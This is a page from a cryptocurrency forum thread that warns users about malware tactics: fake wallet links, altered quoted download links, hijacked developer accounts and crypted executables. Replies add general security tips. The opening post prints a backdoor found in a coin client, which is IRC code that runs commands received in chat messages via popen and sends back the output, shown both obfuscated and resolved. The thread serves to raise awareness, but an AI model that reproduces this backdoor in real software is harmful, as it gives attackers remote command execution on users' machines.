Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 27. (Read 859303 times)

newbie
Activity: 42
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
good to know thank you
newbie
Activity: 2
Merit: 0
this is very helpful. am very carefree while on the net. but with this information i will be more cautious
jr. member
Activity: 336
Merit: 1
I need my hardwallet now, too many risk in this crypto world, many scammers out there  Huh lol
copper member
Activity: 288
Merit: 0
GYM Rewards, Mine with Your Body!
Why can't we just get along Smiley
member
Activity: 336
Merit: 10
I am happy to have made this decision. It will greatly improve my performance
newbie
Activity: 130
Merit: 0
Some steps must be taken which are good enough to protect your systems to be hacked such as not to use unknown exe, use of linux which seems to be less vunarable to virus.
newbie
Activity: 16
Merit: 0
The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.

For password use a password safe like Enpass or 1password. Copy paste your password is safer than type it out. You can also use a virtual keyboard for that or for your credit card codes. A keylogger will see only the ‘clicks’ then ☺︎
3zy
newbie
Activity: 16
Merit: 0
recenlty I was a victim of this.
sr. member
Activity: 616
Merit: 321
Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected
newbie
Activity: 2
Merit: 0
does anyone here tried cisco amp?
newbie
Activity: 1
Merit: 0
Appreciate the update. Any good stories about catching these guys?
newbie
Activity: 107
Merit: 0
Bitdefender+Malwarebytes+ADW Cleaner Smiley
newbie
Activity: 26
Merit: 0
some site have mining scrypts that mine monero
member
Activity: 126
Merit: 10
Everything I say is in My Opinion Only!
Its time to buy hardware wallets.

That is very sound advice! The Ledger Nano S is an excellent choice to protect against malware or ransomeware viruses. However, be careful who you buy it from. Get it from the manufacturer directly or from a licensed retailer.
newbie
Activity: 8
Merit: 0
thanks for this very valuable info. but I'm just thinking is an antivirus like eset or kapersky not enough? I mean they are kind of decent anti-virus(malware) right? anyways thanks again. keep us informed in the future. thank you.
newbie
Activity: 4
Merit: 0
I have long ago on my own mistakes realized that opening any links is very unsafe. Therefore, I usually use either a sandbox for windows (https://ru.wikipedia.org/wiki/Sandboxie) or a virtual machine. This is very useful in terms of security.
Using bootable windows could also be an problem solver here. Thanks for spreading the word.
newbie
Activity: 31
Merit: 0
How do we stop this malware to infect our computers?
sr. member
Activity: 266
Merit: 250
I have long ago on my own mistakes realized that opening any links is very unsafe. Therefore, I usually use either a sandbox for windows (https://ru.wikipedia.org/wiki/Sandboxie) or a virtual machine. This is very useful in terms of security.
newbie
Activity: 27
Merit: 0
Thanks for sharing, very helpful information.
legendary
Activity: 1894
Merit: 1001
I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?

 sounds like you might've cought something there. i've heard of a virus that replaces BTC addresses when pasting.

no reason to panic, scan your pc, and remove the bug, i use clamwin + malwarebytes

last resort backup your stuf and reinstall the OS after a full reformat  Smiley
Pages:
Jump to: